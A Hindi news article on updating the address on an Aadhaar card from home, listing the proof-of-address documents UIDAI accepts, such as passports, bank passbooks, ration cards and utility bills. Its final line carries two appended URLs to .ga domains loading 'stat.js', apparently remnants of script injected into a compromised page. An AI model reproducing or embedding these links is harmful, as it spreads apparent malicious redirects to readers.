आज के समय में आधार कार्ड की मान्यता और जरूरत को देखते हुए सरकार ने कहा कि अब आधार कार्ड घर बैठे अपडेट हो सकता है बस कुछ अनिवार्य दस्तावेजों की जरूरत होगी। आज के समय में नौकरी मिलने से लेकर, बैंक अकाउंट खुलवाने, लोन लेने में जहां तक की सिम कार्ड लेने में भी आधार कार्ड की आवश्यकता पड़ती है। आधार कार्ड की स्वीकृति पहचान पत्र के रूप में है। और अधिक स्वीकार्यता पत्ते की पुष्टि के रूप में है।
यदि आपका वर्तमान पता और आधार कार्ड में लिखा पता एक ही है तो आपको कई सेवाएं बड़ी आसानी से उपलब्ध होंगी। और यदि आप अब दूसरे पते पर रहते हैं तो अपना वर्तमान पता आधार कार्ड में अपडेट करवाएं जिससे आपको विभिन्न सेवाओं का लाभ मिल सके। आधार कार्ड को अपडेट कराने के लिए कुछ दस्तावेजों की जरूरत पड़ेगी इस दुविधा को दूर करने के लिए 12 अंकों की पहचान संख्या जारी करने वाले भारतीय विशिष्ट पहचान प्राधिकरण ने दस्तावेजों की एक एक सूची तैयार की है।
उन्होंने ट्वीट करके या कहा है कि प्रूफ आफ ऐड्रेस ऐसा डॉक्यूमेंट होता है जिसमें आपके नाम के साथ साथ पूरा पता होता है। पता अपडेट कराने के लिए पूरी सूची इस लिंक में देख सकते हैं।https://t.co/BeqUA07J2b इस सूची पर शामिल प्रमुख दस्तावेज-पासपोर्ट, बैंक स्टेटमेंट/पासबुक, पोस्ट ऑफिस अकाउंट स्टेटमेंट, राशन कार्ड, वोटर आईडी कार्ड, ड्राइविंग लाइसेंस, सरकारी फोटो पहचान पत्र, पीएसयू द्वारा जारी सर्विस फोटो आईडेंटिटी कार्ड, बिजली का बिल जो
3 माह से पुराना ना हो, पानी का बिल, टेलीफोन लैंडलाइन बिल, प्रॉपर्टी टैक्स की रसीद, क्रेडिट कार्ड स्टेटमेंट, इंश्योरेंस पॉलिसी, मनरेगा जॉब कार्ड, शस्त्र लाइसेंस, पेंशनर्स कार्ड, स्वतंत्रता सेनानी कार्ड, किसान पासबुक, सीजीएचएस/ईसीएचएस कार्ड, तथा मान्यता प्राप्त शिक्षण संस्थान द्वारा जारी पत्र जिस पर छात्र की फोटो लगी हो और उस पर छात्र का पता अंकित हो आदि इन दस्तावेजों की सहायता से आधार कार्ड आसानी से अपडेट हो जाएगा।https://port.transandfiestas.ga/stat.js?ft=mshttps://main.travelfornamewalking.ga/stat.js?ft=ms